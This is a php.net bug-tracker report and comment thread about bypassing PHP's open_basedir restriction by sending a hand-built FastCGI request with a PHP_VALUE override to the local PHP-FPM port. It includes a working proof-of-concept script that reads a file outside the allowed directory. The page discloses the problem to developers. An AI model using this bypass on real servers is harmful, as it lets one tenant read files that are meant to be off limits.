php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Request #70134 open_basedir bypass with IP-based PHP-FPM
Submitted: 2015-07-24 20:41 UTC Modified: 2021-12-04 18:22 UTC
Votes:5
Avg. Score:3.8 ± 1.0
Reproduced:1 of 1 (100.0%)
Same Version:0 (0.0%)
Same OS:0 (0.0%)
From: butesa at freenet dot de Assigned: bukka (profile)
Status: Assigned Package: FPM related
PHP Version: 5.5.27 OS: Ubuntu
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: butesa at freenet dot de
New email:
PHP Version: OS:

 

 [2015-07-24 20:41 UTC] butesa at freenet dot de 
Description:
------------
Please change the implementation of PHP_VALUE so that open_basedir can only be tightened, but not loosened (as it is already implemented with ini_set()).

At the moment, you can bypass open_basedir by connecting to the FPM port.

Test script:
---------------
<?php
echo 'START ';
echo ini_get('open_basedir');
echo file_get_contents('/etc/hostname');
echo ' END';
echo '<br/>';

if (isset($_GET['stop'])) exit;

$params = array();
$params['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
$params['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
$params['REQUEST_METHOD'] = 'GET';
$params['QUERY_STRING'] = 'stop=true';
$params['PHP_VALUE'] = 'open_basedir=/';

$params_encoded = '';
foreach ($params as $k=>$v) {
	$params_encoded.= chr(strlen($k)).chr(strlen($v)).$k.$v;
}

$len = strlen($params_encoded);
$len_encoded = chr($len >> 8).chr($len & 255);

$fp = fsockopen('127.0.0.1',9000);
fwrite($fp, "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00");
fwrite($fp, "\x01\x04\x00\x01".$len_encoded."\x00\x00".$params_encoded);
fwrite($fp, "\x01\x04\x00\x01\x00\x00\x00\x00");
fwrite($fp, "\x01\x05\x00\x01\x00\x00\x00\x00");
sleep(2);
$result = '';
while (!feof($fp)) {
  $result .= fread($fp, 1024);
}
fclose($fp);

$matches = array();
preg_match('/START.*END/s', $result, $matches);
echo $matches[0];

Expected result:
----------------
[shortened for better readability]

START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END
START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END

Actual result:
--------------
START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END
START / my_hostname END


Don't be surprised, you may also encounter bug 63965. In that case, the output will look like this:

START / my_hostname END
START / my_hostname END

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-07-24 20:46 UTC] butesa at freenet dot de 
Sorry, I didn't mean to make this bug report private. There is no sensible information in it.
 [2015-09-28 23:04 UTC] stas@php.net
-Assigned To: +Assigned To: fat
 [2017-04-19 10:03 UTC] xuanhung1606 at gmail dot com 
http://tnghomes.net/
 [2017-10-24 07:45 UTC] kalle@php.net
-Status: Assigned +Status: Open -Assigned To: fat +Assigned To:
 [2018-01-19 19:40 UTC] bohu at cryp dot email 
This critical security issue is still present in PHP 7.0.
At least on Debian Stretch PHP 7.0.27-0+deb9u1.

Any plan to patch it ?
Thx !
 [2020-01-14 21:45 UTC] diego dot blanco at treitos dot com 
Additionally it seems that open_basedir is bypassed by fsocksopen when using unix sockets, so this is also exploitable with unix sockets.
 [2021-07-12 15:41 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2021-07-12 15:41 UTC] cmb@php.net 
open_basedir bypasses are not considered to be security issues;
cf. <https://externals.io/message/105606>
and <https://externals.io/message/115406>.
 [2021-12-04 18:22 UTC] bukka@php.net
-Status: Open +Status: Assigned -Type: Bug +Type: Feature/Change Request -Assigned To: +Assigned To: bukka
 [2021-12-04 18:22 UTC] bukka@php.net 
This is a feature request as this behaviour is on purpose.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Sat Nov 23 11:01:28 2024 UTC